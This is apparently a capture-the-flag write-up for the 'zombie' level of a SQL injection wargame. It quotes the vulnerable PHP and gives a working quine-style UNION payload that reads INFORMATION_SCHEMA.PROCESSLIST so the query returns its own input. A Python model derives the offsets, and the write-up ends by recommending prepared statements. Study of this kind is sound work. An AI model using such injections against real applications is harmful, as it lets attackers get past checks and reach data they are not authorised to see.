31_zombie.txt
https://dev.mysql.com/doc/refman/5.7/en/information-schema-processlist-table.html
quine hack :)
ZOMBIE Clear!
<?php
include "./config.php";
login_chk();
$db = dbconnect("zombie");
if(preg_match('/rollup|join|ace|@/i', $_GET['pw'])) exit("No Hack ~_~");
$query = "select pw from prob_zombie where pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['pw']) echo "<h2>Pw : {$result[pw]}</h2>";
if(($result['pw']) && ($result['pw'] === $_GET['pw'])) solve("zombie");
highlight_file(__FILE__);
?>
1. Check that we can read INFORMATION_SCHEMA.PROCESSLIST (the blacklist does not block it, and the statement currently being executed appears in its info column):
query: x' union SELECT info FROM INFORMATION_SCHEMA.PROCESSLIST;%23
response:
Pw : select pw from prob_zombie where pw='x' union SELECT info FROM INFORMATION_SCHEMA.PROCESSLIST;#'
2. Cut the text down to just our own input. The template prefix select pw from prob_zombie where pw=' is 37 characters, so our input starts at position 38 of info (SUBSTR positions are 1-based). The input itself must be exactly 72 characters long, so that SUBSTR(info,38,72) returns it and nothing else (the template's closing ' is left off):
length: 72
select pw from prob_zombie where pw='x' union SELECT SUBSTR(info,38,72) FROM INFORMATION_SCHEMA.PROCESSLIST;#'
                                     |----------------------------------------------------------------------|
3. Prepare the payload. The row the union returns is the payload text itself, so it is === $_GET['pw'] and solve("zombie") is called:
query : select pw from prob_zombie where pw='x' union SELECT SUBSTR(info,38,72) FROM INFORMATION_SCHEMA.PROCESSLIST;#'
Pw : x' union SELECT SUBSTR(info,38,72) FROM INFORMATION_SCHEMA.PROCESSLIST;#
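Added example (not part of the original notes or the challenge code): an offline model of why the 38/72 pair works and how to derive it. The self-referential input names its own length inside itself, so the length is a fixed point: the example iterates on it until the string is as long as it says it is, then replays the server-side comparison with a small model of MySQL's SUBSTR and of what PROCESSLIST.info would contain. Names such as build_payload, find_fixed_point and simulate_check are mine, and the model assumes info holds exactly the executing statement text.

```python
import re

# Fixed text the challenge PHP wraps around the user input (from the query echo above).
PREFIX = "select pw from prob_zombie where pw='"
SUFFIX = "'"


def build_payload(start: int, length: int) -> str:
    """Input of the form used in the write-up, selecting a slice of the running query."""
    return (f"x' union SELECT SUBSTR(info,{start},{length}) "
            f"FROM INFORMATION_SCHEMA.PROCESSLIST;#")


def find_fixed_point(prefix: str = PREFIX, max_iter: int = 10):
    """Find (start, length, payload) such that len(payload) == length.

    start is fixed: the 1-based position right after the template prefix.
    length is found by iteration, since writing the number into the string
    can change the string's own length (digit count); a few rounds settle it.
    """
    start = len(prefix) + 1
    length = 1
    for _ in range(max_iter):
        candidate = build_payload(start, length)
        if len(candidate) == length:
            return start, length, candidate
        length = len(candidate)
    raise RuntimeError("no fixed point found (digit-count boundary)")


def mysql_substr(s: str, pos: int, length: int) -> str:
    """Model of MySQL SUBSTR(str, pos, len) for a positive 1-based pos."""
    return s[pos - 1 : pos - 1 + length]


def simulate_check(pw: str, prefix: str = PREFIX, suffix: str = SUFFIX) -> bool:
    """Replay the challenge's final comparison for a given pw value.

    The executing statement (what PROCESSLIST.info would show) is the
    template with pw spliced in; the UNION row is SUBSTR(info, start, length)
    as named inside pw. The check passes only when that row === pw.
    """
    query = prefix + pw + suffix
    m = re.search(r"SUBSTR\(info,(\d+),(\d+)\)", pw)
    if not m:
        return False
    returned = mysql_substr(query, int(m.group(1)), int(m.group(2)))
    return returned == pw


if __name__ == "__main__":
    start, length, payload = find_fixed_point()
    print(start, length)            # 38 72
    print(payload)
    print(simulate_check(payload))  # True
```

The loop stops because the only thing that changes between rounds is the digit count of the length, which is stable at two digits here; a payload whose length straddled 99/100 would need a padding character added to the dummy value (the leading x) to settle. The comparison side is the real lesson for a fix: the `===` is not the weakness, the string-built query is. Binding pw as a prepared-statement parameter makes the union impossible, and a keyword blacklist like rollup|join|ace|@ cannot stand in for that.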